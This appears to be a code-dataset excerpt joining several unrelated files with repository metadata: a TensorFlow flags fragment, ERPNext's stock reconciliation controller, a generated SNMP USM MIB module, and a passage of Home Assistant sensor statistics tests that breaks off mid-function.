tf.app.flags.DEFINE_boolean('visualice_conv1_kernels', True, "Hacer Summary de kernels")
titulosStr = ("Fisica universita,"
"Patrones de diseño,"
"Introducción a Mineria de datos,"
"Mineria de datos a traves de ejemplos,"
"Sistemas expertos,"
"Sistemas inteligentes,"
"Big data,"
"Analisis matematico (vol 3 / Azul),"
"Einstein,"
"Analisis matematico (vol 2 / Amarillo),"
"Teoria de control,"
"Empresas de consultoría,"
"Legislación,"
"En cambio,"
"Liderazgo Guardiola,"
"Constitución Argentina,"
"El arte de conversar,"
"El señor de las moscas,"
"Revista: Epigenetica,"
"Revista: Lado oscuro del cosmos")
tf.app.flags.DEFINE_string('titulos', titulosStr, 'Titulos de los libros')
| mit | -2,154,105,897,107,655,400 | 57.174825 | 121 | 0.642505 | false |
gangadharkadam/office_erp | erpnext/stock/doctype/stock_reconciliation/stock_reconciliation.py | 1 | 11155 | # Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
import frappe.defaults
import json
from frappe import msgprint, _
from frappe.utils import cstr, flt, cint
from erpnext.stock.stock_ledger import update_entries_after
from erpnext.controllers.stock_controller import StockController
class StockReconciliation(StockController):
def __init__(self, arg1, arg2=None):
super(StockReconciliation, self).__init__(arg1, arg2)
self.head_row = ["Item Code", "Warehouse", "Quantity", "Valuation Rate"]
def validate(self):
self.entries = []
self.validate_data()
self.validate_expense_account()
def on_submit(self):
self.insert_stock_ledger_entries()
self.make_gl_entries()
def on_cancel(self):
self.delete_and_repost_sle()
self.make_cancel_gl_entries()
def validate_data(self):
if not self.reconciliation_json:
return
data = json.loads(self.reconciliation_json)
# strip out extra columns (if any)
data = [row[:4] for row in data]
if self.head_row not in data:
msgprint(_("""Wrong Template: Unable to find head row."""),
raise_exception=1)
# remove the help part and save the json
head_row_no = 0
if data.index(self.head_row) != 0:
head_row_no = data.index(self.head_row)
data = data[head_row_no:]
self.reconciliation_json = json.dumps(data)
def _get_msg(row_num, msg):
return _("Row # {0}: ").format(row_num+head_row_no+2) + msg
self.validation_messages = []
item_warehouse_combinations = []
# validate no of rows
rows = data[1:]
if len(rows) > 100:
msgprint(_("""Sorry! We can only allow upto 100 rows for Stock Reconciliation."""),
raise_exception=True)
for row_num, row in enumerate(rows):
# find duplicates
if [row[0], row[1]] in item_warehouse_combinations:
self.validation_messages.append(_get_msg(row_num, _("Duplicate entry")))
else:
item_warehouse_combinations.append([row[0], row[1]])
self.validate_item(row[0], row_num+head_row_no+2)
# validate warehouse
if not frappe.db.get_value("Warehouse", row[1]):
self.validation_messages.append(_get_msg(row_num, _("Warehouse not found in the system")))
# if both not specified
if row[2] == "" and row[3] == "":
self.validation_messages.append(_get_msg(row_num,
_("Please specify either Quantity or Valuation Rate or both")))
# do not allow negative quantity
if flt(row[2]) < 0:
self.validation_messages.append(_get_msg(row_num,
_("Negative Quantity is not allowed")))
# do not allow negative valuation
if flt(row[3]) < 0:
self.validation_messages.append(_get_msg(row_num,
_("Negative Valuation Rate is not allowed")))
# throw all validation messages
if self.validation_messages:
for msg in self.validation_messages:
msgprint(msg)
raise frappe.ValidationError
def validate_item(self, item_code, row_num):
from erpnext.stock.doctype.item.item import validate_end_of_life, \
validate_is_stock_item, validate_cancelled_item
# using try except to catch all validation msgs and display together
try:
item = frappe.get_doc("Item", item_code)
if not item:
raise frappe.ValidationError, (_("Item: {0} not found in the system").format(item_code))
# end of life and stock item
validate_end_of_life(item_code, item.end_of_life, verbose=0)
validate_is_stock_item(item_code, item.is_stock_item, verbose=0)
# item should not be serialized
if item.has_serial_no == "Yes":
raise frappe.ValidationError, _("Serialized Item {0} cannot be updated \
using Stock Reconciliation").format(item_code)
# item managed batch-wise not allowed
if item.has_batch_no == "Yes":
raise frappe.ValidationError, _("Item: {0} managed batch-wise, can not be reconciled using \
Stock Reconciliation, instead use Stock Entry").format(item_code)
# docstatus should be < 2
validate_cancelled_item(item_code, item.docstatus, verbose=0)
except Exception, e:
self.validation_messages.append(_("Row # ") + ("%d: " % (row_num)) + cstr(e))
def insert_stock_ledger_entries(self):
""" find difference between current and expected entries
and create stock ledger entries based on the difference"""
from erpnext.stock.utils import get_valuation_method
from erpnext.stock.stock_ledger import get_previous_sle
row_template = ["item_code", "warehouse", "qty", "valuation_rate"]
if not self.reconciliation_json:
msgprint(_("""Stock Reconciliation file not uploaded"""), raise_exception=1)
data = json.loads(self.reconciliation_json)
for row_num, row in enumerate(data[data.index(self.head_row)+1:]):
row = frappe._dict(zip(row_template, row))
row["row_num"] = row_num
previous_sle = get_previous_sle({
"item_code": row.item_code,
"warehouse": row.warehouse,
"posting_date": self.posting_date,
"posting_time": self.posting_time
})
# check valuation rate mandatory
if row.qty != "" and not row.valuation_rate and \
flt(previous_sle.get("qty_after_transaction")) <= 0:
frappe.throw(_("Valuation Rate required for Item {0}").format(row.item_code))
change_in_qty = row.qty != "" and \
(flt(row.qty) - flt(previous_sle.get("qty_after_transaction")))
change_in_rate = row.valuation_rate != "" and \
(flt(row.valuation_rate) - flt(previous_sle.get("valuation_rate")))
if get_valuation_method(row.item_code) == "Moving Average":
self.sle_for_moving_avg(row, previous_sle, change_in_qty, change_in_rate)
else:
self.sle_for_fifo(row, previous_sle, change_in_qty, change_in_rate)
def sle_for_moving_avg(self, row, previous_sle, change_in_qty, change_in_rate):
"""Insert Stock Ledger Entries for Moving Average valuation"""
def _get_incoming_rate(qty, valuation_rate, previous_qty, previous_valuation_rate):
if previous_valuation_rate == 0:
return flt(valuation_rate)
else:
if valuation_rate == "":
valuation_rate = previous_valuation_rate
return (qty * valuation_rate - previous_qty * previous_valuation_rate) \
/ flt(qty - previous_qty)
if change_in_qty:
# if change in qty, irrespective of change in rate
incoming_rate = _get_incoming_rate(flt(row.qty), flt(row.valuation_rate),
flt(previous_sle.get("qty_after_transaction")),
flt(previous_sle.get("valuation_rate")))
row["voucher_detail_no"] = "Row: " + cstr(row.row_num) + "/Actual Entry"
self.insert_entries({"actual_qty": change_in_qty, "incoming_rate": incoming_rate}, row)
elif change_in_rate and flt(previous_sle.get("qty_after_transaction")) > 0:
# if no change in qty, but change in rate
# and positive actual stock before this reconciliation
incoming_rate = _get_incoming_rate(
flt(previous_sle.get("qty_after_transaction"))+1, flt(row.valuation_rate),
flt(previous_sle.get("qty_after_transaction")),
flt(previous_sle.get("valuation_rate")))
# +1 entry
row["voucher_detail_no"] = "Row: " + cstr(row.row_num) + "/Valuation Adjustment +1"
self.insert_entries({"actual_qty": 1, "incoming_rate": incoming_rate}, row)
# -1 entry
row["voucher_detail_no"] = "Row: " + cstr(row.row_num) + "/Valuation Adjustment -1"
self.insert_entries({"actual_qty": -1}, row)
def sle_for_fifo(self, row, previous_sle, change_in_qty, change_in_rate):
"""Insert Stock Ledger Entries for FIFO valuation"""
previous_stock_queue = json.loads(previous_sle.get("stock_queue") or "[]")
previous_stock_qty = sum((batch[0] for batch in previous_stock_queue))
previous_stock_value = sum((batch[0] * batch[1] for batch in \
previous_stock_queue))
def _insert_entries():
if previous_stock_queue != [[row.qty, row.valuation_rate]]:
# make entry as per attachment
if row.qty:
row["voucher_detail_no"] = "Row: " + cstr(row.row_num) + "/Actual Entry"
self.insert_entries({"actual_qty": row.qty,
"incoming_rate": flt(row.valuation_rate)}, row)
# Make reverse entry
if previous_stock_qty:
row["voucher_detail_no"] = "Row: " + cstr(row.row_num) + "/Reverse Entry"
self.insert_entries({"actual_qty": -1 * previous_stock_qty,
"incoming_rate": previous_stock_qty < 0 and
flt(row.valuation_rate) or 0}, row)
if change_in_qty:
if row.valuation_rate == "":
# dont want change in valuation
if previous_stock_qty > 0:
# set valuation_rate as previous valuation_rate
row.valuation_rate = previous_stock_value / flt(previous_stock_qty)
_insert_entries()
elif change_in_rate and previous_stock_qty > 0:
# if no change in qty, but change in rate
# and positive actual stock before this reconciliation
row.qty = previous_stock_qty
_insert_entries()
def insert_entries(self, opts, row):
"""Insert Stock Ledger Entries"""
args = frappe._dict({
"doctype": "Stock Ledger Entry",
"item_code": row.item_code,
"warehouse": row.warehouse,
"posting_date": self.posting_date,
"posting_time": self.posting_time,
"voucher_type": self.doctype,
"voucher_no": self.name,
"company": self.company,
"stock_uom": frappe.db.get_value("Item", row.item_code, "stock_uom"),
"voucher_detail_no": row.voucher_detail_no,
"fiscal_year": self.fiscal_year,
"is_cancelled": "No"
})
args.update(opts)
self.make_sl_entries([args])
# append to entries
self.entries.append(args)
def delete_and_repost_sle(self):
""" Delete Stock Ledger Entries related to this voucher
and repost future Stock Ledger Entries"""
existing_entries = frappe.db.sql("""select distinct item_code, warehouse
from `tabStock Ledger Entry` where voucher_type=%s and voucher_no=%s""",
(self.doctype, self.name), as_dict=1)
# delete entries
frappe.db.sql("""delete from `tabStock Ledger Entry`
where voucher_type=%s and voucher_no=%s""", (self.doctype, self.name))
# repost future entries for selected item_code, warehouse
for entries in existing_entries:
update_entries_after({
"item_code": entries.item_code,
"warehouse": entries.warehouse,
"posting_date": self.posting_date,
"posting_time": self.posting_time
})
def get_gl_entries(self, warehouse_account=None):
if not self.cost_center:
msgprint(_("Please enter Cost Center"), raise_exception=1)
return super(StockReconciliation, self).get_gl_entries(warehouse_account,
self.expense_account, self.cost_center)
def validate_expense_account(self):
if not cint(frappe.defaults.get_global_default("auto_accounting_for_stock")):
return
if not self.expense_account:
msgprint(_("Please enter Expense Account"), raise_exception=1)
elif not frappe.db.sql("""select * from `tabStock Ledger Entry`"""):
if frappe.db.get_value("Account", self.expense_account, "report_type") == "Profit and Loss":
frappe.throw(_("Difference Account must be a 'Liability' type account, since this Stock Reconciliation is an Opening Entry"))
@frappe.whitelist()
def upload():
from frappe.utils.datautils import read_csv_content_from_uploaded_file
csv_content = read_csv_content_from_uploaded_file()
return filter(lambda x: x and any(x), csv_content)
| agpl-3.0 | -2,882,474,033,307,407,400 | 35.335505 | 129 | 0.688839 | false |
kdart/pycopia | mibs/pycopia/mibs/SNMP_USER_BASED_SM_MIB.py | 1 | 8334 | # python
# This file is generated by a program (mib2py). Any edits will be lost.
from pycopia.aid import Enum
import pycopia.SMI.Basetypes
Range = pycopia.SMI.Basetypes.Range
Ranges = pycopia.SMI.Basetypes.Ranges
from pycopia.SMI.Objects import ColumnObject, MacroObject, NotificationObject, RowObject, ScalarObject, NodeObject, ModuleObject, GroupObject
# imports
from SNMPv2_SMI import MODULE_IDENTITY, OBJECT_TYPE, OBJECT_IDENTITY, snmpModules, Counter32
from SNMPv2_CONF import MODULE_COMPLIANCE, OBJECT_GROUP
from SNMPv2_TC import TEXTUAL_CONVENTION, TestAndIncr, RowStatus, RowPointer, StorageType, AutonomousType
from SNMP_FRAMEWORK_MIB import SnmpAdminString, SnmpEngineID, snmpAuthProtocols, snmpPrivProtocols
class SNMP_USER_BASED_SM_MIB(ModuleObject):
path = '/usr/share/mibs/ietf/SNMP-USER-BASED-SM-MIB'
conformance = 5
name = 'SNMP-USER-BASED-SM-MIB'
language = 2
description = 'The management information definitions for the\nSNMP User-based Security Model.\n\nCopyright (C) The Internet Society (2002). This\nversion of this MIB module is part of RFC 3414;\nsee the RFC itself for full legal notices.'
# nodes
class usmNoAuthProtocol(NodeObject):
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 10, 1, 1, 1])
name = 'usmNoAuthProtocol'
class usmHMACMD5AuthProtocol(NodeObject):
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 10, 1, 1, 2])
name = 'usmHMACMD5AuthProtocol'
class usmHMACSHAAuthProtocol(NodeObject):
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 10, 1, 1, 3])
name = 'usmHMACSHAAuthProtocol'
class usmNoPrivProtocol(NodeObject):
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 10, 1, 2, 1])
name = 'usmNoPrivProtocol'
class usmDESPrivProtocol(NodeObject):
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 10, 1, 2, 2])
name = 'usmDESPrivProtocol'
class snmpUsmMIB(NodeObject):
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15])
name = 'snmpUsmMIB'
class usmMIBObjects(NodeObject):
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1])
name = 'usmMIBObjects'
class usmStats(NodeObject):
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 1])
name = 'usmStats'
class usmUser(NodeObject):
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2])
name = 'usmUser'
class usmMIBConformance(NodeObject):
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 2])
name = 'usmMIBConformance'
class usmMIBCompliances(NodeObject):
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 2, 1])
name = 'usmMIBCompliances'
class usmMIBGroups(NodeObject):
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 2, 2])
name = 'usmMIBGroups'
# macros
# types
class KeyChange(pycopia.SMI.Basetypes.OctetString):
status = 1
# scalars
class usmStatsUnsupportedSecLevels(ScalarObject):
access = 4
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 1, 1])
syntaxobject = pycopia.SMI.Basetypes.Counter32
class usmStatsNotInTimeWindows(ScalarObject):
access = 4
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 1, 2])
syntaxobject = pycopia.SMI.Basetypes.Counter32
class usmStatsUnknownUserNames(ScalarObject):
access = 4
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 1, 3])
syntaxobject = pycopia.SMI.Basetypes.Counter32
class usmStatsUnknownEngineIDs(ScalarObject):
access = 4
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 1, 4])
syntaxobject = pycopia.SMI.Basetypes.Counter32
class usmStatsWrongDigests(ScalarObject):
access = 4
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 1, 5])
syntaxobject = pycopia.SMI.Basetypes.Counter32
class usmStatsDecryptionErrors(ScalarObject):
access = 4
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 1, 6])
syntaxobject = pycopia.SMI.Basetypes.Counter32
class usmUserSpinLock(ScalarObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 1])
syntaxobject = pycopia.SMI.Basetypes.TestAndIncr
# columns
class usmUserEngineID(ColumnObject):
access = 2
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 1])
syntaxobject = SnmpEngineID
class usmUserName(ColumnObject):
access = 2
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 2])
syntaxobject = SnmpAdminString
class usmUserSecurityName(ColumnObject):
access = 4
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 3])
syntaxobject = SnmpAdminString
class usmUserCloneFrom(ColumnObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 4])
syntaxobject = pycopia.SMI.Basetypes.RowPointer
class usmUserAuthProtocol(ColumnObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 5])
syntaxobject = pycopia.SMI.Basetypes.AutonomousType
class usmUserAuthKeyChange(ColumnObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 6])
syntaxobject = KeyChange
class usmUserOwnAuthKeyChange(ColumnObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 7])
syntaxobject = KeyChange
class usmUserPrivProtocol(ColumnObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 8])
syntaxobject = pycopia.SMI.Basetypes.AutonomousType
class usmUserPrivKeyChange(ColumnObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 9])
syntaxobject = KeyChange
class usmUserOwnPrivKeyChange(ColumnObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 10])
syntaxobject = KeyChange
class usmUserPublic(ColumnObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 11])
syntaxobject = pycopia.SMI.Basetypes.OctetString
class usmUserStorageType(ColumnObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 12])
syntaxobject = pycopia.SMI.Basetypes.StorageType
class usmUserStatus(ColumnObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 13])
syntaxobject = pycopia.SMI.Basetypes.RowStatus
# rows
class usmUserEntry(RowObject):
status = 1
index = pycopia.SMI.Objects.IndexObjects([usmUserEngineID, usmUserName], False)
create = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1])
access = 2
rowstatus = usmUserStatus
columns = {'usmUserEngineID': usmUserEngineID, 'usmUserName': usmUserName, 'usmUserSecurityName': usmUserSecurityName, 'usmUserCloneFrom': usmUserCloneFrom, 'usmUserAuthProtocol': usmUserAuthProtocol, 'usmUserAuthKeyChange': usmUserAuthKeyChange, 'usmUserOwnAuthKeyChange': usmUserOwnAuthKeyChange, 'usmUserPrivProtocol': usmUserPrivProtocol, 'usmUserPrivKeyChange': usmUserPrivKeyChange, 'usmUserOwnPrivKeyChange': usmUserOwnPrivKeyChange, 'usmUserPublic': usmUserPublic, 'usmUserStorageType': usmUserStorageType, 'usmUserStatus': usmUserStatus}
# notifications (traps)
# groups
class usmMIBBasicGroup(GroupObject):
access = 2
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 2, 2, 1])
group = [usmStatsUnsupportedSecLevels, usmStatsNotInTimeWindows, usmStatsUnknownUserNames, usmStatsUnknownEngineIDs, usmStatsWrongDigests, usmStatsDecryptionErrors, usmUserSpinLock, usmUserSecurityName, usmUserCloneFrom, usmUserAuthProtocol, usmUserAuthKeyChange, usmUserOwnAuthKeyChange, usmUserPrivProtocol, usmUserPrivKeyChange, usmUserOwnPrivKeyChange, usmUserPublic, usmUserStorageType, usmUserStatus]
# capabilities
# special additions
# Add to master OIDMAP.
from pycopia import SMI
SMI.update_oidmap(__name__)
| apache-2.0 | -6,750,926,250,645,303,000 | 31.940711 | 547 | 0.735781 | false |
home-assistant/home-assistant | tests/components/sensor/test_recorder.py | 1 | 19938 | """The tests for sensor recorder platform."""
# pylint: disable=protected-access,invalid-name
from datetime import timedelta
from unittest.mock import patch, sentinel
from homeassistant.components.recorder import history
from homeassistant.components.recorder.const import DATA_INSTANCE
from homeassistant.components.recorder.models import process_timestamp_to_utc_isoformat
from homeassistant.components.recorder.statistics import statistics_during_period
from homeassistant.const import STATE_UNAVAILABLE
from homeassistant.setup import setup_component
import homeassistant.util.dt as dt_util
from tests.components.recorder.common import wait_recording_done
def test_compile_hourly_statistics(hass_recorder):
"""Test compiling hourly statistics."""
hass = hass_recorder()
recorder = hass.data[DATA_INSTANCE]
setup_component(hass, "sensor", {})
zero, four, states = record_states(hass)
hist = history.get_significant_states(hass, zero, four)
assert dict(states) == dict(hist)
recorder.do_adhoc_statistics(period="hourly", start=zero)
wait_recording_done(hass)
stats = statistics_during_period(hass, zero)
assert stats == {
"sensor.test1": [
{
"statistic_id": "sensor.test1",
"start": process_timestamp_to_utc_isoformat(zero),
"mean": 15.0,
"min": 10.0,
"max": 20.0,
"last_reset": None,
"state": None,
"sum": None,
}
]
}
def test_compile_hourly_energy_statistics(hass_recorder):
"""Test compiling hourly statistics."""
hass = hass_recorder()
recorder = hass.data[DATA_INSTANCE]
setup_component(hass, "sensor", {})
sns1_attr = {"device_class": "energy", "state_class": "measurement"}
sns2_attr = {"device_class": "energy"}
sns3_attr = {}
zero, four, eight, states = record_energy_states(
hass, sns1_attr, sns2_attr, sns3_attr
)
hist = history.get_significant_states(
hass, zero - timedelta.resolution, eight + timedelta.resolution
)
assert dict(states)["sensor.test1"] == dict(hist)["sensor.test1"]
recorder.do_adhoc_statistics(period="hourly", start=zero)
wait_recording_done(hass)
recorder.do_adhoc_statistics(period="hourly", start=zero + timedelta(hours=1))
wait_recording_done(hass)
recorder.do_adhoc_statistics(period="hourly", start=zero + timedelta(hours=2))
wait_recording_done(hass)
stats = statistics_during_period(hass, zero)
assert stats == {
"sensor.test1": [
{
"statistic_id": "sensor.test1",
"start": process_timestamp_to_utc_isoformat(zero),
"max": None,
"mean": None,
"min": None,
"last_reset": process_timestamp_to_utc_isoformat(zero),
"state": 20.0,
"sum": 10.0,
},
{
"statistic_id": "sensor.test1",
"start": process_timestamp_to_utc_isoformat(zero + timedelta(hours=1)),
"max": None,
"mean": None,
"min": None,
"last_reset": process_timestamp_to_utc_isoformat(four),
"state": 40.0,
"sum": 10.0,
},
{
"statistic_id": "sensor.test1",
"start": process_timestamp_to_utc_isoformat(zero + timedelta(hours=2)),
"max": None,
"mean": None,
"min": None,
"last_reset": process_timestamp_to_utc_isoformat(four),
"state": 70.0,
"sum": 40.0,
},
]
}
def test_compile_hourly_energy_statistics2(hass_recorder):
"""Test compiling hourly statistics."""
hass = hass_recorder()
recorder = hass.data[DATA_INSTANCE]
setup_component(hass, "sensor", {})
sns1_attr = {"device_class": "energy", "state_class": "measurement"}
sns2_attr = {"device_class": "energy", "state_class": "measurement"}
sns3_attr = {"device_class": "energy", "state_class": "measurement"}
zero, four, eight, states = record_energy_states(
hass, sns1_attr, sns2_attr, sns3_attr
)
hist = history.get_significant_states(
hass, zero - timedelta.resolution, eight + timedelta.resolution
)
assert dict(states)["sensor.test1"] == dict(hist)["sensor.test1"]
recorder.do_adhoc_statistics(period="hourly", start=zero)
wait_recording_done(hass)
recorder.do_adhoc_statistics(period="hourly", start=zero + timedelta(hours=1))
wait_recording_done(hass)
recorder.do_adhoc_statistics(period="hourly", start=zero + timedelta(hours=2))
wait_recording_done(hass)
stats = statistics_during_period(hass, zero)
assert stats == {
"sensor.test1": [
{
"statistic_id": "sensor.test1",
"start": process_timestamp_to_utc_isoformat(zero),
"max": None,
"mean": None,
"min": None,
"last_reset": process_timestamp_to_utc_isoformat(zero),
"state": 20.0,
"sum": 10.0,
},
{
"statistic_id": "sensor.test1",
"start": process_timestamp_to_utc_isoformat(zero + timedelta(hours=1)),
"max": None,
"mean": None,
"min": None,
"last_reset": process_timestamp_to_utc_isoformat(four),
"state": 40.0,
"sum": 10.0,
},
{
"statistic_id": "sensor.test1",
"start": process_timestamp_to_utc_isoformat(zero + timedelta(hours=2)),
"max": None,
"mean": None,
"min": None,
"last_reset": process_timestamp_to_utc_isoformat(four),
"state": 70.0,
"sum": 40.0,
},
],
"sensor.test2": [
{
"statistic_id": "sensor.test2",
"start": process_timestamp_to_utc_isoformat(zero),
"max": None,
"mean": None,
"min": None,
"last_reset": process_timestamp_to_utc_isoformat(zero),
"state": 130.0,
"sum": 20.0,
},
{
"statistic_id": "sensor.test2",
"start": process_timestamp_to_utc_isoformat(zero + timedelta(hours=1)),
"max": None,
"mean": None,
"min": None,
"last_reset": process_timestamp_to_utc_isoformat(four),
"state": 45.0,
"sum": -95.0,
},
{
"statistic_id": "sensor.test2",
"start": process_timestamp_to_utc_isoformat(zero + timedelta(hours=2)),
"max": None,
"mean": None,
"min": None,
"last_reset": process_timestamp_to_utc_isoformat(four),
"state": 75.0,
"sum": -65.0,
},
],
"sensor.test3": [
{
"statistic_id": "sensor.test3",
"start": process_timestamp_to_utc_isoformat(zero),
"max": None,
"mean": None,
"min": None,
"last_reset": process_timestamp_to_utc_isoformat(zero),
"state": 5.0,
"sum": 5.0,
},
{
"statistic_id": "sensor.test3",
"start": process_timestamp_to_utc_isoformat(zero + timedelta(hours=1)),
"max": None,
"mean": None,
"min": None,
"last_reset": process_timestamp_to_utc_isoformat(four),
"state": 50.0,
"sum": 30.0,
},
{
"statistic_id": "sensor.test3",
"start": process_timestamp_to_utc_isoformat(zero + timedelta(hours=2)),
"max": None,
"mean": None,
"min": None,
"last_reset": process_timestamp_to_utc_isoformat(four),
"state": 90.0,
"sum": 70.0,
},
],
}
def test_compile_hourly_statistics_unchanged(hass_recorder):
"""Test compiling hourly statistics, with no changes during the hour."""
hass = hass_recorder()
recorder = hass.data[DATA_INSTANCE]
setup_component(hass, "sensor", {})
zero, four, states = record_states(hass)
hist = history.get_significant_states(hass, zero, four)
assert dict(states) == dict(hist)
recorder.do_adhoc_statistics(period="hourly", start=four)
wait_recording_done(hass)
stats = statistics_during_period(hass, four)
assert stats == {
"sensor.test1": [
{
"statistic_id": "sensor.test1",
"start": process_timestamp_to_utc_isoformat(four),
"mean": 20.0,
"min": 20.0,
"max": 20.0,
"last_reset": None,
"state": None,
"sum": None,
}
]
}
def test_compile_hourly_statistics_partially_unavailable(hass_recorder):
"""Test compiling hourly statistics, with the sensor being partially unavailable."""
hass = hass_recorder()
recorder = hass.data[DATA_INSTANCE]
setup_component(hass, "sensor", {})
zero, four, states = record_states_partially_unavailable(hass)
hist = history.get_significant_states(hass, zero, four)
assert dict(states) == dict(hist)
recorder.do_adhoc_statistics(period="hourly", start=zero)
wait_recording_done(hass)
stats = statistics_during_period(hass, zero)
assert stats == {
"sensor.test1": [
{
"statistic_id": "sensor.test1",
"start": process_timestamp_to_utc_isoformat(zero),
"mean": 17.5,
"min": 10.0,
"max": 25.0,
"last_reset": None,
"state": None,
"sum": None,
}
]
}
def test_compile_hourly_statistics_unavailable(hass_recorder):
"""Test compiling hourly statistics, with the sensor being unavailable."""
hass = hass_recorder()
recorder = hass.data[DATA_INSTANCE]
setup_component(hass, "sensor", {})
zero, four, states = record_states_partially_unavailable(hass)
hist = history.get_significant_states(hass, zero, four)
assert dict(states) == dict(hist)
recorder.do_adhoc_statistics(period="hourly", start=four)
wait_recording_done(hass)
stats = statistics_during_period(hass, four)
assert stats == {}
def record_states(hass):
"""Record some test states.
We inject a bunch of state updates for temperature sensors.
"""
mp = "media_player.test"
sns1 = "sensor.test1"
sns2 = "sensor.test2"
sns3 = "sensor.test3"
sns1_attr = {"device_class": "temperature", "state_class": "measurement"}
sns2_attr = {"device_class": "temperature"}
sns3_attr = {}
def set_state(entity_id, state, **kwargs):
"""Set the state."""
hass.states.set(entity_id, state, **kwargs)
wait_recording_done(hass)
return hass.states.get(entity_id)
zero = dt_util.utcnow()
one = zero + timedelta(minutes=1)
two = one + timedelta(minutes=15)
three = two + timedelta(minutes=30)
four = three + timedelta(minutes=15)
states = {mp: [], sns1: [], sns2: [], sns3: []}
with patch("homeassistant.components.recorder.dt_util.utcnow", return_value=one):
states[mp].append(
set_state(mp, "idle", attributes={"media_title": str(sentinel.mt1)})
)
states[mp].append(
set_state(mp, "YouTube", attributes={"media_title": str(sentinel.mt2)})
)
states[sns1].append(set_state(sns1, "10", attributes=sns1_attr))
states[sns2].append(set_state(sns2, "10", attributes=sns2_attr))
states[sns3].append(set_state(sns3, "10", attributes=sns3_attr))
with patch("homeassistant.components.recorder.dt_util.utcnow", return_value=two):
states[sns1].append(set_state(sns1, "15", attributes=sns1_attr))
states[sns2].append(set_state(sns2, "15", attributes=sns2_attr))
states[sns3].append(set_state(sns3, "15", attributes=sns3_attr))
with patch("homeassistant.components.recorder.dt_util.utcnow", return_value=three):
states[sns1].append(set_state(sns1, "20", attributes=sns1_attr))
states[sns2].append(set_state(sns2, "20", attributes=sns2_attr))
states[sns3].append(set_state(sns3, "20", attributes=sns3_attr))
return zero, four, states
def record_energy_states(hass, _sns1_attr, _sns2_attr, _sns3_attr):
"""Record some test states.
We inject a bunch of state updates for energy sensors.
"""
sns1 = "sensor.test1"
sns2 = "sensor.test2"
sns3 = "sensor.test3"
sns4 = "sensor.test4"
def set_state(entity_id, state, **kwargs):
"""Set the state."""
hass.states.set(entity_id, state, **kwargs)
wait_recording_done(hass)
return hass.states.get(entity_id)
zero = dt_util.utcnow()
one = zero + timedelta(minutes=15)
two = one + timedelta(minutes=30)
three = two + timedelta(minutes=15)
four = three + timedelta(minutes=15)
five = four + timedelta(minutes=30)
six = five + timedelta(minutes=15)
seven = six + timedelta(minutes=15)
eight = seven + timedelta(minutes=30)
sns1_attr = {**_sns1_attr, "last_reset": zero.isoformat()}
